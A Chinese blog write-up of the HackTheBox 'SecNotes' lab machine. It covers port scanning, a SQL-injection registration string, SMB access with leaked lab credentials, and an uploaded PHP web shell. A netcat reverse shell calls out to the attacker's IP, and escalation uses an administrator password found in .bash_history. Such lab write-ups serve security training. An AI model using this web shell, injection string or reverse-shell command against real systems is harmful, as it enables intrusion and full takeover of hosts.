hackthebox-secnotes (IIS-php )

1、扫描

445开了说明可能有smb登录,8808有http

C:\root> masscan -p1-65535,U:1-65535 10.10.10.97 --rate=1000 -e tun0

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-02-12 01:45:25 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 445/tcp on 10.10.10.97                                    
Discovered open port 8808/tcp on 10.10.10.97                                   
Discovered open port 80/tcp on 10.10.10.97                                     
^Zte:  0.00-kpps, 100.00% done, waiting -22-secs, found=3         
[1]+  Stopped                 masscan -p1-65535,U:1-65535 10.10.10.97 --rate=1000 -e tun0
C:\root> nmap -A 10.10.10.97 -p445,8808,80
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-12 09:48 CST
Nmap scan report for secnotes.htb (10.10.10.97)
Host is up (0.35s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp  open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h39m59s, deviation: 4h37m09s, median: -1s
| smb-os-discovery: 
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2021-02-11T17:48:43-08:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-02-12T01:48:45
|_  start_date: N/A


2、注入 & smb渗透

8808
注册,进入。但是中规中矩没啥用
注册时用注入 test' or 1=1-- -
再登录,就可以看到新东西了,明显的smb登录信息。把这个10.10.10.97 secnotes.htb加到本机/etc/hosts
在这里插入图片描述
进入smbsmbclient //secnotes.htb/new-site -U "tyler",输入密码92g!mA8BGjOirkL%OG*&

ls查看发现就是网页里iis的默认图片。说明往里面传什么,网页就相应有什么。
那么根据套路 一般iis传asp aspx之类,但是都没用,再试试传cmd.php put cmd.php。试whoami成功显示
cmd.php里的内容

<?php echo shell_exec($_GET['cmd']); ?>

在这里插入图片描述
接着传nc put nc.exe进去,弹shell
多次执行都弹不回shell。
最终上传nc64位 加 用curl才管用

curl "http://10.10.10.97:8808/cmd.php?cmd=nc64.exe+-e+cmd.exe+10.10.14.15+443"

3、提权

在用户桌面发现bash这一linux才用的东西,很奇怪
在这里插入图片描述

全靶机搜bash.exe

where /R C:\ bash.exe

第二个可用
在这里插入图片描述
跟linux操作一样的了,变ttypython -c 'import pty;pty.spawn("/bin/bash")'
查看隐藏文件,发现历史,打开看cat .bash_history
在这里插入图片描述
发现admin的账号密码,administrator%u6!4ZwgwOM#^OBf#Nwnh
用impacket包https://github.com/SecureAuthCorp/impacket里的psexec.py直接登录psexec.py administrator@10.10.10.97
拿下。
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值